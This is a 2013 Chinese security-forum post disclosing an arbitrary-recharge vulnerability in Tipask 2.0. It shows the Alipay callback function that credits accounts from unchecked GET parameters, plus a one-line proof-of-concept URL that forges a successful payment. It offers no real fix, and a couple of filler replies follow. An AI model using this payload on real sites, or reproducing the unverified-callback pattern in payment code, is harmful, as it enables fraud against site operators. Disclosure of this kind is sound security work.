搜索
查看: 678|回复: 2

Tipask 2.0 任意充值漏洞

[复制链接]

432

主题

573

帖子

2543

积分

核心成员

Rank: 8Rank: 8

积分
2543
发表于 2013-9-24 11:24:31 | 显示全部楼层 |阅读模式

披露状态:

2013-06-24:        积极联系厂商并且等待厂商认领中,细节不对外公开
2013-09-22:        厂商已经主动忽略漏洞,细节向公众公开
简要描述:
系统未检查传入参数的有效性
详细说明:
function onaliapyback() {

        if ($_GET['trade_status' ] == 'TRADE_SUCCESS') {

            $credit2 = $_GET[ 'total_fee'] * $this->setting['recharge_rate' ];

            $this->credit($this-> user['uid' ], 0, $credit2, 0, "支付宝充值");

            $this->message( "充值成功" , "user/score" );

        } else {

            $this->message( "服务器繁忙,请稍后再试!" , 'STOP' );

        }

    }




直接传入total_fee既可
漏洞证明:
/?ebank/aliapyback.html&trade_status=TRADE_SUCCESS&total_fee=99
修复方案:
坐等忽略

您可以更新记录, 让好友们知道您在做什么...
专业回帖 该用户已被删除
发表于 2013-9-24 14:49:39 | 显示全部楼层
沙发!沙发!
专业回帖 该用户已被删除
发表于 2013-9-24 17:33:14 | 显示全部楼层
大家互帮互助
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表